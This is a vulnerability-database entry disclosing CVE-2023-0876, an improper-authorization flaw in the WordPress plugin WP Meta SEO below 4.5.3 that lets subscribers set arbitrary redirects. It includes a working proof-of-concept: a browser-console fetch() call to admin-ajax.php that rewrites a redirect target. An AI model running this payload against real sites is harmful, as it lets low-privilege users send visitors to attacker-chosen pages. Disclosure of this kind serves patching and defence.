Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitDc11WPEX-ID:1A8C97F9-98FA-4E29-B7F7-BB9ABE0C42EA
HistoryFeb 27, 2023 - 12:00 a.m.

WP Meta SEO < 4.5.3 - Subscriber+ Improper Authorization causing Arbitrary Redirect

2023-02-2700:00:00
dc11
58
wordpress
security
authorization
redirect

EPSS

0.001

Percentile

39.7%

JSON

The plugin does not authorize several ajax actions, allowing low-privilege users to make updates to certain data and leading to an arbitrary redirect vulnerability.

Visit, for example, the page <yourhost>?p=99999. This should create the first auto redirect entry in the wp_wpms_links table with ID 1. Now log in as a subscriber and enter the following js code in your web console on the dashboard:

fetch( 'admin-ajax.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body:'action=wpms&wpms_nonce=' + wpms_localize.wpms_nonce + "&task=update_link_redirect&link_id=1&link_redirect=https://google.com" } );

Now load <yourhost>?p=99999 again and notice that it redirects to `https://google.com`.

Related

openvas 1
nvd 1
wpvulndb 1
cve 1
prion 1
cvelist 1
openvas
openvas
WordPress WP Meta SEO Plugin < 4.5.3 Open Redirect Vulnerability
2023-05-11 00:00:00
nvd
nvd
CVE-2023-0876
2023-03-20 16:15:12
wpvulndb
wpvulndb
WP Meta SEO < 4.5.3 - Subscriber+ Improper Authorization causing Arbitrary Redirect
2023-02-27 00:00:00
cve
cve
CVE-2023-0876
2023-03-20 16:15:12
prion
prion
Spoofing
2023-03-20 16:15:00
cvelist
cvelist
CVE-2023-0876 WP Meta SEO < 4.5.3 - Subscriber+ Improper Authorization causing Arbitrary Redirect
2023-03-20 15:52:08

EPSS

0.001

Percentile

39.7%

JSON
Related for WPEX-ID:1A8C97F9-98FA-4E29-B7F7-BB9ABE0C42EA
openvas1nvd1wpvulndb1cve1prion1cvelist1